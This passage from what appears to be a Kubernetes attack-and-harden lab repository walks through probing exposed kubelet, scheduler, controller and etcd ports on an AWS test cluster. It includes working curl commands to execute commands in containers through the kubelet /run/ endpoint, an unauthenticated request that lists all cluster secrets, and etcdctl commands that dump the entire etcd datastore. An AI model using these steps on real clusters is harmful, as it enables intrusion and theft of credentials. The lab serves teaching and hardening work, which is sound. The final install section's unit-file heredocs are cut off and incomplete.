"silent" and the `-k` tells curl to allow connections without certificates. 353 | 354 | According to the source code, the following endpoints are available on both the Kubelet "read-only" API and "read/write" API: 355 | 356 | - `/metrics` 357 | - `/metrics/cadvisor` 358 | - `/spec/` 359 | - `/stats/` 360 | 361 | The following endpoints are only available on the Kubelet's "read/write" API: 362 | - `/logs/` - Get logs from a pod/container. 363 | - `/run/` - Alias for `/exec/` 364 | - `/exec/` - Exec a command in a running container 365 | - `/attach/` - Attach to the `stdout` of a running container 366 | - `/portForward/` - Forward a port directly to a container 367 | - `/containerLogs/` - Get logs from a pod/container. 368 | - `/runningpods/` - Lists all running pods in short JSON form 369 | - `/debug/pprof/` - Various go debugging performance endpoints 370 | 371 | Directly leveraging the unprotected `kubelet` API to: 372 | - [List running Pods](kubelet-list-pods.md) 373 | - [View Pod Logs](kubelet-pod-logs.md) 374 | - [Execute commands](kubelet-exploit.md) inside the containers 375 | 376 | As you can see, the `kubelet` is essentially a remote API running as `root` on your system that /always/ needs additional hardening to prevent seriously useful avenues for escalation. 
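To make that concrete, here is a minimal sketch of driving the read/write API directly with `curl`. The namespace, pod, and container names below are placeholders; the real values come from the `/runningpods/` listing on your own cluster:

```
# Enumerate every pod this kubelet is running (no credentials required)
$ curl -sk https://$CONTROLLERIP:10250/runningpods/
# Run an arbitrary command inside a chosen container via the /run/ endpoint
# Path format: /run/<namespace>/<pod-name>/<container-name>, command passed as "cmd"
$ curl -sk -X POST "https://$CONTROLLERIP:10250/run/<namespace>/<pod-name>/<container-name>" -d "cmd=id"
```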
377 | 378 | ### Probe the `Kubernetes Scheduler HTTP` service: 379 | 380 | Verify the port is responding: 381 | ``` 382 | $ nc -vz $CONTROLLERIP 10251 383 | Connection to 54.89.108.72 port 10251 [tcp/*] succeeded! 384 | ``` 385 | Hit `tcp/10251` via curl: 386 | ``` 387 | $ curl $CONTROLLERIP:10251 388 | 404 page not found 389 | $ curl $CONTROLLERIP:10251/healthz 390 | ok 391 | ``` 392 | 393 | ### Probe the `Kubernetes Controller Manager` service: 394 | 395 | Verify the port is responding: 396 | ``` 397 | $ nc -vz $CONTROLLERIP 10252 398 | Connection to 54.89.108.72 port 10252 [tcp/apollo-relay] succeeded! 399 | ``` 400 | Hit `tcp/10252` via curl: 401 | ``` 402 | $ curl $CONTROLLERIP:10252 403 | 404 page not found 404 | $ curl $CONTROLLERIP:10252/healthz 405 | ok 406 | ``` 407 | 408 | ### Probe the `Kubelet Read-Only` service: 409 | 410 | Verify the port is responding: 411 | ``` 412 | $ nc -vz $CONTROLLERIP 10255 413 | Connection to 54.89.108.72 port 10255 [tcp/*] succeeded! 414 | ``` 415 | According to the source code, the following endpoints are available on the Kubelet "read-only" API: 416 | 417 | - `/metrics` 418 | - `/metrics/cadvisor` 419 | - `/spec/` 420 | - `/stats/` 421 | 422 | Hit `tcp/10255` via curl: 423 | 424 | ``` 425 | $ curl $CONTROLLERIP:10255 426 | 404 page not found 427 | ``` 428 | The `/healthz` endpoint reports the health of the Kubelet. 429 | ``` 430 | $ curl $CONTROLLERIP:10255/healthz 431 | ok 432 | ``` 433 | The `/metrics` from the Kubelet indicate how busy the node is in terms of the `docker` runtime and how many containers "churn" on this node. 434 | 435 | [```$ curl $CONTROLLERIP:10255/metrics ```](cmd/kubelet-metrics.md) 436 | 437 | The `/metrics/cadvisor` endpoint passes through the metrics from the cAdvisor port. 438 | 439 | [```$ curl $CONTROLLERIP:10255/metrics/cadvisor```](cmd/kubelet-metrics-cadvisor.md) 440 | 441 | The `/spec/` endpoint writes the cAdvisor `MachineInfo()` output, and this gives a couple hints that it runs on AWS, the instance type, and the instance ID: 442 | 443 | [```$ curl $CONTROLLERIP:10255/spec/ ```](cmd/kubelet-spec.md) 444 | 445 | The `/pods` endpoint provides the near-equivalent of `kubectl get pods -o json` for the pods running on this node: 446 | 447 | [`$ curl -s $CONTROLLERIP:10255/pods`](cmd/kubelet-pods.md) 448 | 449 | ### Probe the `Kube-Proxy Healthcheck` service: 450 | 451 | Verify the port is responding: 452 | ``` 453 | $ nc -vz $CONTROLLERIP 10256 454 | Connection to 54.89.108.72 port 10256 [tcp/*] succeeded! 455 | ``` 456 | Hit `tcp/10256` via curl: 457 | ``` 458 | $ curl $CONTROLLERIP:10256 459 | 404 page not found 460 | $ curl $CONTROLLERIP:10256/healthz 461 | {"lastUpdated": "2018-03-27 21:17:09.14039841 +0000 UTC m=+888081.767665429","currentTime": "2018-03-27 21:17:36.679120214 +0000 UTC m=+888109.306387163"} 462 | ``` 463 | 464 | Access to the Kubernetes API or the Kubelet read/write API from anywhere is almost a guaranteed full compromise of the cluster including all of its data, secrets, and source code. 
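To drive that home, a single unauthenticated request to the insecure API port returns every secret stored in the cluster. A minimal sketch, reusing the `$CONTROLLERIP` variable from above:

```
# List all secrets cluster-wide via the insecure port; no authn/authz is performed,
# so service account tokens and any stored credentials come back in the response.
$ curl -s http://$CONTROLLERIP:8080/api/v1/secrets?limit=500
```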
465 | 466 | [Back](/README.md#level-0-attacks) | [Next](direct-worker.md) 467 | -------------------------------------------------------------------------------- /docs/direct-etcd.md: -------------------------------------------------------------------------------- 1 | # Access the Etcd Services Directly 2 | 3 | ## Services Available 4 | 5 | - `22/tcp` - [SSH](https://openssh.org) 6 | - `2379/tcp` - [Etcd server service](https://github.com/coreos/etcd#etcd-tcp-ports) 7 | - `2380/tcp` - [Etcd peer discovery service](https://github.com/coreos/etcd#etcd-tcp-ports) 8 | 9 | This initial `etcd` configuration is unlikely to be found in the wild, but it's important to understand the mechanics and the risks of letting the data in `etcd` fall into the hands of a malicious entity. 10 | 11 | Set the `etcd` IP to a variable: 12 | ``` 13 | $ export ETCDIP=$(aws ec2 describe-instances \ 14 | --region ${AWS_DEFAULT_REGION} \ 15 | --filter 'Name=tag:Name,Values=etcd' \ 16 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 17 | --output text) 18 | ``` 19 | 20 | ### Probe the `ssh` port: 21 | 22 | Verify the port is responding: 23 | ``` 24 | $ nc -v $ETCDIP 22 25 | Connection to 18.233.67.127 port 22 [tcp/ssh] succeeded! 26 | SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 27 | ``` 28 | While not completely insecure with decent `sshd` configuration, exposure of SSH credentials/keys from other systems that are shared with this system means an attacker can attempt to use them directly. Also, SSH bots are hyper-focused on the known cloud-provider IP ranges, so it's not a place to be complacent. 29 | 30 | ### Probe the `etcd` server port: 31 | 32 | Verify the port is responding: 33 | ``` 34 | $ nc -z $ETCDIP 2379 35 | Connection to 18.233.67.127 port 2379 [tcp/*] succeeded! 36 | ``` 37 | From this, we know that an external IP can access the `etcd` server directly. This shouldn't ever be the case! 38 | 39 | Verify that the port is a web port: 40 | ``` 41 | $ curl $ETCDIP:2379 42 | 404 page not found 43 | ``` 44 | This tells us that `etcd` is not listening with TLS and it's reachable. This is catastrophically bad for the integrity of this cluster. The next steps are to validate the version and get all the data. 45 | 46 | Obtain the `etcd` version: 47 | ``` 48 | $ curl $ETCDIP:2379/version 49 | {"etcdserver":"3.2.11","etcdcluster":"3.2.0"} 50 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" version 51 | etcdctl version: 3.3.2 52 | API version: 3.3 53 | ``` 54 | 55 | Use `etcdctl` to get the `etcd` cluster health: 56 | ``` 57 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" endpoint health 58 | http://18.233.67.127:2379 is healthy: successfully committed proposal: took = 6.903553ms 59 | ``` 60 | 61 | Get the `etcd` cluster members: 62 | ``` 63 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" member list 64 | e0187950b759a617, started, ip-10-1-0-5, http://10.1.0.5:2380, http://10.1.0.5:2379 65 | ``` 66 | 67 | Because the `etcdctl` commands were successful, it means we most likely have full access to the data in this `etcd` cluster. It's a very similar parallel to having direct `root` access to a database that backends a webserver. 
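Before pulling down everything, a quick look at a sample of keys confirms this `etcd` holds Kubernetes state. A sketch, assuming the same `etcdctl` binary and `$ETCDIP` variable as above:

```
# Kubernetes stores its objects under the /registry prefix using the
# /registry/<resource>/<namespace>/<name> convention; list a sample of keys.
$ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" \
    get /registry --prefix --keys-only | head -20
```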
68 | 69 | Dump the entire contents of `etcd`'s datastore: 70 | ``` 71 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" get "" --from-key > etcd.raw 72 | or 73 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" snapshot save etcd.dump 74 | Snapshot saved at etcd.dump 75 | ``` 76 | 77 | Dig into the `etcd.dump` using `vi` or [boltbrowser](https://github.com/br0xen/boltbrowser): 78 | ``` 79 | $ vi etcd.raw 80 | or 81 | $ vi etcd.dump 82 | or 83 | $ ./boltbrowser etcd.dump 84 | ``` 85 | We now have a complete, bit-for-bit copy of the entire state of the cluster. This includes pods, configmaps, secrets, and more. In essence, this cluster is completely "pwned". 86 | 87 | ### Probe the `etcd` peer discovery port: 88 | 89 | Verify the port is responding: 90 | ``` 91 | $ nc -z $ETCDIP 2380 92 | Connection to 18.233.67.127 port 2380 [tcp/*] succeeded! 93 | ``` 94 | 95 | Verify that the port is a web port: 96 | ``` 97 | $ curl $ETCDIP:2380 98 | 404 page not found 99 | ``` 100 | 101 | Obtain the `etcd` version: 102 | ``` 103 | $ curl $ETCDIP:2380/version 104 | {"etcdserver":"3.2.11","etcdcluster":"3.2.0"} 105 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" version 106 | etcdctl version: 3.3.2 107 | API version: 3.3 108 | ``` 109 | The `etcd` discovery service should not be exposed to any systems but the `etcd` servers. Because we have direct access to `tcp/2379` and `tcp/2380`, it's likely that a "rogue" etcd attack could be carried out. 110 | 111 | [Back](/README.md#level-0-attacks) | [Next](direct-controller.md) 112 | -------------------------------------------------------------------------------- /docs/direct-worker.md: -------------------------------------------------------------------------------- 1 | # Access the Kubernetes Worker 2 | 3 | ## Services Available 4 | 5 | - `22/tcp` - [SSH](https://openssh.org) 6 | - `4194/tcp` - [Kubelet cAdvisor endpoint](https://github.com/google/cadvisor) 7 | - `10248/tcp` - [Kubelet Healthz Endpoint](https://kubernetes.io/docs/reference/generated/kubelet/) 8 | - `10249/tcp` - [Kube-Proxy Metrics](https://kubernetes.io/docs/reference/generated/kube-proxy/) 9 | - `10250/tcp` - [Kubelet Read/Write API](https://kubernetes.io/docs/reference/generated/kubelet) 10 | - `10255/tcp` - [Kubelet Read-only API](https://kubernetes.io/docs/reference/generated/kubelet) 11 | - `10256/tcp` - [Kube-Proxy health check server](https://kubernetes.io/docs/reference/generated/kube-proxy/) 12 | 13 | Unlike the `etcd` and `controller` configuration, this configuration of the `kubelet` isn't that far off most recent configurations. Many self-made clusters do a decent job protecting `etcd` and the API server, but not all of them ensure the `kubelet` performs authn/authz to protect its API. 
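A quick way to tell which kind of cluster you're facing (using the `$WORKER1IP` variable exported a few steps below) is to ask the kubelet for its pod list anonymously. This is a sketch of the check, not an exact transcript: a kubelet enforcing authn/authz answers `Unauthorized`, while this cluster's kubelet happily returns pod JSON.

```
# Anonymous probe of the kubelet API; "Unauthorized" means authn/authz is enforced,
# while a JSON pod list means the kubelet is wide open.
$ curl -sk https://$WORKER1IP:10250/pods | head -c 200
```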
14 | 15 | For more information on the real risks of this attack vector, here is a recent writeup of an actual attack: 16 | - [https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c](https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c) 17 | 18 | Set the SSH Key, Region, and `worker-1` IP to variables: 19 | 20 | ``` 21 | $ export KEY_NAME="hkfs" 22 | $ export AWS_DEFAULT_REGION="us-east-1" 23 | $ export WORKER1IP=$(aws ec2 describe-instances \ 24 | --region ${AWS_DEFAULT_REGION} \ 25 | --filter 'Name=tag:Name,Values=worker-1' \ 26 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 27 | --output text) 28 | ``` 29 | 30 | ### Probe the `ssh` port: 31 | 32 | Verify the port is responding: 33 | ``` 34 | $ nc -v $WORKER1IP 22 35 | Connection to 54.234.61.224 port 22 [tcp/ssh] succeeded! 36 | SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 37 | ``` 38 | 39 | ### Probe the `cAdvisor` service: 40 | 41 | Verify the port is responding: 42 | ``` 43 | $ nc -vz $WORKER1IP 4194 44 | Connection to 54.234.61.224 port 4194 [tcp/*] succeeded! 45 | ``` 46 | Hit `tcp/4194` via curl: 47 | ``` 48 | $ curl $WORKER1IP:4194 49 | Temporary Redirect. 50 | ``` 51 | 52 | Just like the [controller](direct-controller.md), the `worker` exposes `cAdvisor` metrics for this host. 53 | 54 | ### Probe the `Kubelet Healthz` service: 55 | 56 | Verify the port is responding: 57 | ``` 58 | $ nc -vz $WORKER1IP 10248 59 | nc: connect to 54.234.61.224 port 10248 (tcp) failed: Connection refused 60 | ``` 61 | 62 | It's only running on the `localhost` address: 63 | ``` 64 | $ ssh -i ${KEY_NAME}.pem ubuntu@$WORKER1IP 65 | ubuntu@ip-10-1-0-11:~$ curl localhost:10248/ 66 | 404 page not found 67 | ubuntu@ip-10-1-0-11:~$ curl localhost:10248/healthz 68 | ok 69 | ``` 70 | 71 | ### Probe the `Kube-Proxy Metrics` service: 72 | 73 | Verify the port is responding: 74 | ``` 75 | $ nc -vz $WORKER1IP 10249 76 | nc: connect to 54.234.61.224 port 10249 (tcp) failed: Connection refused 77 | ``` 78 | 79 | It's only running on the `localhost` address: 80 | ``` 81 | $ ssh -i ${KEY_NAME}.pem ubuntu@$WORKER1IP 82 | ubuntu@ip-10-1-0-11:~$ curl localhost:10249/healthz 83 | ok 84 | ubuntu@ip-10-1-0-11:~$ curl localhost:10249/metrics 85 | ``` 86 | 87 | Similar to the [controller](direct-controller.md), metrics on this host's `kube-proxy` are available at this endpoint. 88 | 89 | ### Probe the `Kubelet Read/Write` service: 90 | 91 | Verify the port is responding: 92 | ``` 93 | $ nc -vz $WORKER1IP 10250 94 | Connection to 54.234.61.224 port 10250 [tcp/*] succeeded! 95 | ``` 96 | 97 | Hit `tcp/10250` via curl: 98 | 99 | ``` 100 | $ curl -sk https://$WORKER1IP:10250/ 101 | ``` 102 | 103 | So, the Kubelet is always listening on a TLS port, but by default, it's not authenticating or authorizing access to it. The `-s` flag makes `curl` silent, and `-k` tells it to skip verification of the server's TLS certificate. 104 | 105 | According to the source code, the following endpoints are available on both the Kubelet "read-only" API and "read/write" API: 106 | 107 | - `/metrics` 108 | - `/metrics/cadvisor` 109 | - `/spec/` 110 | - `/stats/` 111 | 112 | The following endpoints are only available on the Kubelet's "read/write" API: 113 | - `/logs/` - Get logs from a pod/container.
114 | - `/run/` - Alias for `/exec/` 115 | - `/exec/` - Exec a command in a running container 116 | - `/attach/` - Attach to the `stdout` of a running container 117 | - `/portForward/` - Forward a port directly to a container 118 | - `/containerLogs/` - Get logs from a pod/container. 119 | - `/runningpods/` - Lists all running pods in short JSON form 120 | - `/debug/pprof/` - Various go debugging performance endpoints 121 | 122 | Refer to the [controller](direct-controller.md#probe-the-kubelet-readwrite-service) services details for example outputs as these provide similar output for that given node running the `kubelet`. 123 | 124 | ### Probe the `Kubelet Read-Only` service: 125 | 126 | Verify the port is responding: 127 | ``` 128 | $ nc -vz $WORKER1IP 10255 129 | Connection to 54.234.61.224 port 10255 [tcp/*] succeeded! 130 | ``` 131 | According to the source code, the following endpoints are available on the Kubelet "read-only" API: 132 | 133 | - `/metrics` 134 | - `/metrics/cadvisor` 135 | - `/spec/` 136 | - `/stats/` 137 | 138 | Refer to the [controller](direct-controller.md) services details for example outputs as these provide similar output for that given node running the `kubelet`. 139 | 140 | ### Probe the `Kube-Proxy Healthcheck` service: 141 | 142 | Verify the port is responding: 143 | ``` 144 | $ nc -vz $WORKER1IP 10256 145 | Connection to 54.234.61.224 port 10256 [tcp/*] succeeded! 146 | ``` 147 | Hit `tcp/10256` via curl: 148 | ``` 149 | $ curl $WORKER1IP:10256 150 | 404 page not found 151 | $ curl $WORKER1IP:10256/healthz 152 | {"lastUpdated": "2018-03-27 21:17:09.14039841 +0000 UTC m=+888081.767665429","currentTime": "2018-03-27 21:17:36.679120214 +0000 UTC m=+888109.306387163"} 153 | ``` 154 | 155 | [Back](/README.md#level-0-attacks) | [Next](l1-security-groups.md) 156 | -------------------------------------------------------------------------------- /docs/enumerate-ports.md: -------------------------------------------------------------------------------- 1 | # Enumerate Exposed Ports and Services 2 | 3 | ## Etcd 4 | 5 | SSH into the `etcd` instance 6 | ``` 7 | $ export KEY_NAME="hkfs" 8 | $ export AWS_DEFAULT_REGION="us-east-1" 9 | $ ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances \ 10 | --region ${AWS_DEFAULT_REGION} \ 11 | --filter 'Name=tag:Name,Values=etcd' \ 12 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 13 | --output text) 14 | ``` 15 | On the `etcd` system, list the services and processes running: 16 | ``` 17 | $ sudo lsof -i | grep LIST 18 | etcd 1112 root 5u IPv4 15682 0t0 TCP ip-10-1-0-5.ec2.internal:2380 (LISTEN) 19 | etcd 1112 root 6u IPv4 15683 0t0 TCP ip-10-1-0-5.ec2.internal:2379 (LISTEN) 20 | etcd 1112 root 7u IPv4 15684 0t0 TCP localhost:2379 (LISTEN) 21 | sshd 1137 root 3u IPv4 15652 0t0 TCP *:ssh (LISTEN) 22 | sshd 1137 root 4u IPv6 15660 0t0 TCP *:ssh (LISTEN) 23 | ``` 24 | #### Services 25 | - `22/tcp` - [SSH](https://openssh.org) 26 | - `2379/tcp` - [Etcd server service](https://github.com/coreos/etcd#etcd-tcp-ports) 27 | - `2380/tcp` - [Etcd peer discovery service](https://github.com/coreos/etcd#etcd-tcp-ports) 28 | 29 | ## Controller 30 | 31 | SSH into the `controller` instance 32 | ``` 33 | $ ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances \ 34 | --region ${AWS_DEFAULT_REGION} \ 35 | --filter 'Name=tag:Name,Values=controller' \ 36 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 37 | --output text) 38 | ``` 39 | 40 | On the `controller` system, list the 
services and processes running: 41 | ``` 42 | $ sudo lsof -i -nP | grep LIST 43 | kube-prox 1237 root 6u IPv6 16597 0t0 TCP *:10256 (LISTEN) 44 | kube-prox 1237 root 8u IPv4 16599 0t0 TCP 127.0.0.1:10249 (LISTEN) 45 | kubelet 1257 root 6u IPv6 17074 0t0 TCP *:4194 (LISTEN) 46 | kubelet 1257 root 18u IPv4 17213 0t0 TCP 127.0.0.1:10248 (LISTEN) 47 | kubelet 1257 root 20u IPv6 17216 0t0 TCP *:10250 (LISTEN) 48 | kubelet 1257 root 21u IPv6 17218 0t0 TCP *:10255 (LISTEN) 49 | sshd 1268 root 3u IPv4 15100 0t0 TCP *:22 (LISTEN) 50 | sshd 1268 root 4u IPv6 15102 0t0 TCP *:22 (LISTEN) 51 | kube-cont 1275 root 5u IPv6 16701 0t0 TCP *:10252 (LISTEN) 52 | kube-apis 1297 root 67u IPv6 19320 0t0 TCP *:8080 (LISTEN) 53 | kube-sche 1303 root 3u IPv6 16637 0t0 TCP *:10251 (LISTEN) 54 | ``` 55 | 56 | #### Services 57 | - `22/tcp` - [SSH](https://openssh.org) 58 | - `4194/tcp` - [Kubelet cAdvisor endpoint](https://github.com/google/cadvisor) 59 | - `8080/tcp` - [Kubernetes API Server "Insecure" Port](https://kubernetes.io/docs/reference/generated/kube-apiserver/) 60 | - `10248/tcp` - [Kubelet Healthz Endpoint](https://kubernetes.io/docs/reference/generated/kubelet/) 61 | - `10249/tcp` - [Kube-Proxy Metrics](https://kubernetes.io/docs/reference/generated/kube-proxy/) 62 | - `10250/tcp` - [Kubelet Read/Write API](https://kubernetes.io/docs/reference/generated/kubelet) 63 | - `10251/tcp` - [Kubernetes Scheduler HTTP Service](https://kubernetes.io/docs/reference/generated/kube-scheduler/) 64 | - `10252/tcp` - [Kubernetes Controller Manager HTTP Service](https://kubernetes.io/docs/reference/generated/kube-controller-manager/) 65 | - `10255/tcp` - [Kubelet Read-only API](https://kubernetes.io/docs/reference/generated/kubelet) 66 | - `10256/tcp` - [Kube-Proxy health check server](https://kubernetes.io/docs/reference/generated/kube-proxy/) 67 | 68 | ## Worker 69 | 70 | SSH into the `worker-1` instance 71 | ``` 72 | $ ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances \ 73 | --region ${AWS_DEFAULT_REGION} \ 74 | --filter 'Name=tag:Name,Values=worker-1' \ 75 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 76 | --output text) 77 | ``` 78 | 79 | On the `worker-1` system, list the services and processes running: 80 | ``` 81 | $ sudo lsof -i -nP | grep LIST 82 | kube-prox 1240 root 10u IPv4 16479 0t0 TCP 127.0.0.1:10249 (LISTEN) 83 | kube-prox 1240 root 11u IPv6 16484 0t0 TCP *:10256 (LISTEN) 84 | kubelet 1251 root 6u IPv6 16841 0t0 TCP *:4194 (LISTEN) 85 | kubelet 1251 root 18u IPv4 16945 0t0 TCP 127.0.0.1:10248 (LISTEN) 86 | kubelet 1251 root 21u IPv6 16950 0t0 TCP *:10250 (LISTEN) 87 | kubelet 1251 root 22u IPv6 16952 0t0 TCP *:10255 (LISTEN) 88 | sshd 1299 root 3u IPv4 15256 0t0 TCP *:22 (LISTEN) 89 | sshd 1299 root 4u IPv6 15258 0t0 TCP *:22 (LISTEN) 90 | ``` 91 | 92 | #### Services 93 | - `22/tcp` - [SSH](https://openssh.org) 94 | - `4194/tcp` - [Kubelet cAdvisor endpoint](https://github.com/google/cadvisor) 95 | - `10248/tcp` - [Kubelet Healthz Endpoint](https://kubernetes.io/docs/reference/generated/kubelet/) 96 | - `10249/tcp` - [Kube-Proxy Metrics](https://kubernetes.io/docs/reference/generated/kube-proxy/) 97 | - `10250/tcp` - [Kubelet Read/Write API](https://kubernetes.io/docs/reference/generated/kubelet) 98 | - `10255/tcp` - [Kubelet Read-only API](https://kubernetes.io/docs/reference/generated/kubelet) 99 | - `10256/tcp` - [Kube-Proxy health check server](https://kubernetes.io/docs/reference/generated/kube-proxy/) 100 | 101 | [Back](/README.md#level-0-attacks) | 
[Next](direct-etcd.md) 102 | -------------------------------------------------------------------------------- /docs/full-original.md: -------------------------------------------------------------------------------- 1 | # Installation 2 | ## Create the VPC 3 | 4 | ### Cloudformation 5 | 6 | #### Deploy the Cloudformation Template 7 | 8 | ``` 9 | export STACK_NAME="hkfs" 10 | export AWS_DEFAULT_REGION="us-east-1" 11 | export KEY_NAME="hkfs" 12 | export IMAGE_ID="ami-66506c1c" 13 | 14 | aws cloudformation create-stack --region ${AWS_DEFAULT_REGION} --stack-name ${STACK_NAME} --template-body file://templates/${STACK_NAME}.json --output text 15 | 16 | ``` 17 | 18 | #### Obtain the Necessary Variables 19 | 20 | ``` 21 | VPC_ID="$(aws cloudformation describe-stacks --region ${AWS_DEFAULT_REGION} --query 'Stacks[*].Outputs[?OutputKey==`VPCId`].OutputValue[]' --stack-name ${STACK_NAME} --output text)" 22 | echo "${VPC_ID}" 23 | SG_ID="$(aws ec2 describe-security-groups --query 'SecurityGroups[*].GroupId' --region ${AWS_DEFAULT_REGION} --filter "Name=vpc-id,Values=${VPC_ID}" --output text)" 24 | echo "${SG_ID}" 25 | SUBNET_ID="$(aws ec2 describe-subnets --region ${AWS_DEFAULT_REGION} --filter "Name=tag:Name,Values=${STACK_NAME}-subnet" --query 'Subnets[*].SubnetId' --output text)" 26 | echo "${SUBNET_ID}" 27 | ``` 28 | 29 | #### Allow Just our IPs to Reach these Instances on all Ports 30 | 31 | ``` 32 | aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} --group-id ${SG_ID} --protocol all --port 0 --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 33 | ``` 34 | 35 | ## Instance Creation 36 | 37 | ### Prepare a Keypair 38 | 39 | #### Create an SSH Keypair 40 | 41 | ``` 42 | aws ec2 create-key-pair --region ${AWS_DEFAULT_REGION} --key-name ${KEY_NAME} --query 'KeyMaterial' --output text > ${KEY_NAME}.pem 43 | chmod 600 ${KEY_NAME}.pem 44 | ``` 45 | 46 | ### Create Systems 47 | 48 | #### Etcd 49 | 50 | ``` 51 | aws ec2 run-instances --region ${AWS_DEFAULT_REGION} --image-id ${IMAGE_ID} --count 1 --instance-type t2.micro --key-name ${KEY_NAME} --subnet-id ${SUBNET_ID} --associate-public-ip-address --query 'Instances[0].InstanceId' --output text --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=etcd}]' --private-ip-address 10.1.0.5 --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' 52 | ``` 53 | 54 | #### Master 55 | 56 | ``` 57 | aws ec2 run-instances --region ${AWS_DEFAULT_REGION} --image-id ${IMAGE_ID} --count 1 --instance-type t2.small --key-name ${KEY_NAME} --subnet-id ${SUBNET_ID} --associate-public-ip-address --query 'Instances[0].InstanceId' --output text --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=controller}]' --private-ip-address 10.1.0.10 --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' 58 | ``` 59 | 60 | #### Worker-1 and Worker-2 61 | 62 | ``` 63 | aws ec2 run-instances --region ${AWS_DEFAULT_REGION} --image-id ${IMAGE_ID} --count 1 --instance-type t2.small --key-name ${KEY_NAME} --subnet-id ${SUBNET_ID} --associate-public-ip-address --query 'Instances[0].InstanceId' --output text --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=worker-1}]' --private-ip-address 10.1.0.11 --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' 64 | 65 | aws ec2 run-instances --region ${AWS_DEFAULT_REGION} --image-id ${IMAGE_ID} --count 1 --instance-type t2.small --key-name ${KEY_NAME} --subnet-id ${SUBNET_ID} --associate-public-ip-address --query 'Instances[0].InstanceId' --output 
text --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=worker-2}]' --private-ip-address 10.1.0.12 --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' 66 | ``` 67 | 68 | ## VPC Routing 69 | 70 | ### Per-Node Pod CIDR Routes 71 | 72 | #### Obtain the Route Table ID 73 | 74 | ``` 75 | ROUTETABLE_ID=$(aws ec2 describe-route-tables --region ${AWS_DEFAULT_REGION} --filter "Name=tag:Name,Values=${STACK_NAME}-rt" --query 'RouteTables[*].RouteTableId' --output text) 76 | ``` 77 | 78 | #### Obtain the ```controller``` ENI ID 79 | 80 | ``` 81 | CONTROLLERENI_ID=$(aws ec2 describe-instances --region ${AWS_DEFAULT_REGION} --filter 'Name=tag:Name,Values=controller' --query 'Reservations[].Instances[].NetworkInterfaces[0].NetworkInterfaceId' --output text) 82 | ``` 83 | 84 | #### Add the ```controller``` Pod CIDR Route to the Route Table 85 | 86 | ``` 87 | aws ec2 create-route --region ${AWS_DEFAULT_REGION} --route-table-id ${ROUTETABLE_ID} --network-interface-id ${CONTROLLERENI_ID} --destination-cidr-block '10.2.0.0/24' --output text 88 | ``` 89 | 90 | #### Obtain the ```worker-1``` ENI ID 91 | 92 | ``` 93 | WORKER1ENI_ID=$(aws ec2 describe-instances --region ${AWS_DEFAULT_REGION} --filter 'Name=tag:Name,Values=worker-1' --query 'Reservations[].Instances[].NetworkInterfaces[0].NetworkInterfaceId' --output text) 94 | ``` 95 | 96 | #### Add the ```worker-1``` Pod CIDR Route to the Route Table 97 | 98 | ``` 99 | aws ec2 create-route --region ${AWS_DEFAULT_REGION} --route-table-id ${ROUTETABLE_ID} --network-interface-id ${WORKER1ENI_ID} --destination-cidr-block '10.2.1.0/24' --output text 100 | ``` 101 | 102 | #### Obtain the ```worker-2``` ENI ID 103 | 104 | ``` 105 | WORKER2ENI_ID=$(aws ec2 describe-instances --region ${AWS_DEFAULT_REGION} --filter 'Name=tag:Name,Values=worker-2' --query 'Reservations[].Instances[].NetworkInterfaces[0].NetworkInterfaceId' --output text) 106 | ``` 107 | 108 | #### Add the ```worker-2``` Pod CIDR Route to the Route Table 109 | 110 | ``` 111 | aws ec2 create-route --region ${AWS_DEFAULT_REGION} --route-table-id ${ROUTETABLE_ID} --network-interface-id ${WORKER2ENI_ID} --destination-cidr-block '10.2.2.0/24' --output text 112 | ``` 113 | 114 | ## Instance Configuration 115 | 116 | ### Configure the Etcd Instance 117 | 118 | #### SSH Into the Etcd Instance 119 | ``` 120 | ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances --region ${AWS_DEFAULT_REGION} --filter 'Name=tag:Name,Values=etcd' --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' --output text) 121 | ``` 122 | 123 | #### Download the Etcd Binary 124 | ``` 125 | wget -q --show-progress --https-only --timestamping \ 126 | "https://github.com/coreos/etcd/releases/download/v3.2.11/etcd-v3.2.11-linux-amd64.tar.gz" 127 | ``` 128 | 129 | #### Extract the Etcd Binary and Create Needed Folders 130 | ``` 131 | tar -xvf etcd-v3.2.11-linux-amd64.tar.gz 132 | sudo mv etcd-v3.2.11-linux-amd64/etcd* /usr/local/bin/ 133 | sudo mkdir -p /etc/etcd /var/lib/etcd 134 | ``` 135 | 136 | #### Create the ```etcd.service``` Systemd Unit 137 | ``` 138 | cat > etcd.service < kube-apiserver.service < kube-controller-manager.service < kube-scheduler.service < 